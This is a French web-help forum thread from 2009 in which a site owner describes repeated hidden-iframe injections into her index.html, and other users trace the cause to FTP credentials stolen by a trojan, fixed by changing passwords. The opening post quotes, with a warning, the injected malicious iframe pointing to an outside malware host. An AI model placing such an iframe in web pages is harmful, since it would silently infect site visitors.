Virus found HTML/Framer : Attaques IFRAME

Fermé
Cristina, La Webmistress Très Fatiguée - 15 août 2009 à 23:55
 rosure - 5 sept. 2009 à 11:33
Bonjour,

Je suis découragée. J'ai mis mon plus récent site sur le web à la fin juin 2009 et tout allait bien. L'adresse du site est : http://www.video-ste-catherine.com

Vers le milieu du mois de juillet, mon site a commencé à subir des attaques IFRAME quotidiennement (et plusieurs fois par jour) qui faisait en sorte qu'au load de mon fichier index.html après une attaque (c'est d'ailleurs le seul fichier qui subi des attaques, aucun autre fichier HTML ne semble affecté sur mon site web), la ligne IFRAME menait à l'éxécution d'un fichier malveillant sur un serveur externe et tentait d'infecter mes clients.

Voici un exemple du genre de ligne de code qui s'auto-ajoutait à mon fichier au moment d'une attaque IFRAME :

ATTENTION! NE PAS CLIQUER SUR CE LIEN ! - - - <iframe src="http://xb8.ru:8080/ts/in.cgi?pepsi122" width=125 height=125 style="visibility: hidden"></iframe> - - - ATTENTION! NE PAS CLIQUER SUR CE LIEN !

La seule variable est la source du lien. Les fichiers qui se loadaient automatiquement n'était pas systématiquement vénéneux mais la ligne de code était toujours ajoutée à la suite de la ligne <BODY>.

===============================================================================
Je m'arrête ici pour ce qui est de la description des attaques IFRAME, ayant fouillé quelque peu sur le net pour en savoir plus, je crois que ce ne doit pas être un concept qui vous est inconnu... Ci-dessous, ma petite histoire particulière
===============================================================================

Vers la fin du mois du juillet 2009, j'ai retiré le site internet du web de peur d'infecter mes clients avec un virus. Nous avions d'ailleurs reçu des plaintes de deux clients comme quoi leur antivirus s'était emballé à la visite du site. J'ai donc effacé toute trace du site sur le serveur. J'ai supprimé tous les fichiers.

Depuis mardi le 11 août 2009, j'ai remis le site en ligne ainsi que le fichier robots.txt. Par contre, j'ai configuré le fichier de sorte que seul Googlebot aurait accès à mon serveur. Jusqu'à aujourd'hui, 15 août, je ne subi plus qu'une seule attaque par jour. Je contiens le problème en remplaçant le fichier index.html systématiquement après chaque attaque mais le problème est toujours là. Je reste scotchée devant mon ordinateur à faire des refreshs sur ma page index.html.

Comme à l'origine du problème il y avait plusieurs attaques par jour et que mon fichier robots.txt devait autoriser tous les robots (j'en ai aucune certitude parce que c'est ce fichier est un concept tout à fait nouveau pour moi et que je ne m'étais jamais attardé ni à ce fichier, ni à son contenu auparavant) et que maintenant en ayant autorisé qu'un seul robot (Googlebot), je n'ai plus qu'une attaque par jour, je me suis dite qu'en les bloquant tous, j'en aurais plus. (?)

J'ai donc reconfiguré robots.txt :

User-agent: *
Disallow: /

Je me laisse 24 heures afin de savoir si j'ai toujours mon attaque quotidienne mais reste que mon site ne fera pas partie des résultats de recherche d'aucun moteur de recherche.

J'ai vraiment besoin d'aide et qui plus est, je commence à être vraiment coincée dans le temps puisqu'il y a une publicité imprimée qui doit paraître la semaine prochaine (semaine du 17 août 2009) et que je ne veux pas envoyer des clients potentiels sur un site qui transmet des maladies! :(

Merci de votre aide!
Cristina, la webmistress qui veut vraiment en finir avec les IFRAME

P.S. : Le support technique de WebHero.com, mon hébergeur web, ne fait pas grand-chose pour m'aider, malgré le fait que j'ai fait plusieurs fois appel à leur aide...
A voir également:

4 réponses

Bonjour Cristina,
J'ai eu le même problème que toi ces jours ci.
Quand tu as perdu tes clés et que tu es cambriolée tous les jours, tu changes tes serrures, non ?
Là, c'est pareil : les hackers ont tes identifiants FTP : commence par changer le mot de passe et après seulement tu peux nettoyer.
Avant tout : passe ton antivirus : tu as certainement un cheval de troie qui permet à un petit salaupiot de récupérer tes login/password comme il veut.
Bon courage.
0
Cristina La Webmaster qui a un regain d'espoir
24 août 2009 à 20:44
Ollywan, merci! Je change mon mot de passe et je vais regarder ce qui se passe dans les prochains jours. Pour ce qui est de mon ordinateur, il n'est pas infecté. Disons que c'est un tiers, qui je crois, aurait pu contaminer mon site.

Merci énormément pour ton aide!
0
Salut à tous,

j'ai le même problème que vous, pouvez vous me dire si le votre est résolu et si oui comment l'avez vous résolu?
Merci d'avance

PS: mon site est www.jfco-okazion.com
0
Nathie the cattie
4 sept. 2009 à 05:38
Salut Rosure.

Perso, j'ai eu attaque sur attaque pendant pas mal de semaine, (j'ai mis du temps avant me rendre compte qu'en fait un trojan avait piqué tout mes logins FTP... stocké sur mon PC!) Donc pour m'en sortir, j'ai installé "Avast" (la version gratuite : https://www.avast.com/fr-fr/free-antivirus-download ) et il a trouvé le trojan voleur de login/passe FTP. Ensuit, ben c'est lourds, mai j'ai changé tout mes mots de passe FTP... obligé.

Ensuite j'ai renvoyé mes fichiers sur mes serveurs et tout est rentré dans l'ordre. Sauf pour un serveur vachement gros sur lequel, j'avais plus aucun backup. là j'ai utilisé un petit soft payant "Iframe.Attack" (ma boite à payé... genre 15€ je crois) et une fois installé sur mon serveur il a nettoyé tout mes fichiers corrompu en quelques secondes...
voilà le lien : http://www.kawablog.com/scarabox/product.php?id_produit=1&id_rub=2
Il y a une vidéo qui explique comment il marche.

Bon courage.
a+
Nathie the cattie
0
Cristina La Webmaster Qui Étale Ses États d'Ame !
5 sept. 2009 à 02:14
Rosure, je vais t'avouer que je me suis trouvée stupide lorsque j'ai simplement "changé" mes serrures comme Ollywan me l'a suggéré. L'effet a été INSTANTANÉ. Je n'ai plus eu de problème par la suite.

Le problème a persisté 1 mois et demi avant qu'Ollywan mette le doigt sur le bobo. Tu sais... KISS (keep it simple stupid...)

Essaies seulement de changer de mot de passe et vérifie souvent ton site dans les prochains jours et tu verras, tu dormiras mieux...

:)

Gros merci à Ollywan!
0
Ollywan > Cristina La Webmaster Qui Étale Ses États d'Ame !
5 sept. 2009 à 08:12
Pas de quoi Cristina, c'est un plaisir.
Quel anti-spyware utilises-tu ?
Devant ce type d'attaque, on n'est finalement qu'en sursis...
Cordialement,
Ollywan
0
Salut à tous,

Je voulais vous remercier pour votre aide, en effet j'ai changé mes mots de passe FTP et depuis 3 jours plus de problème. En espérant que cela continu.

Encore merci
ROSURE
0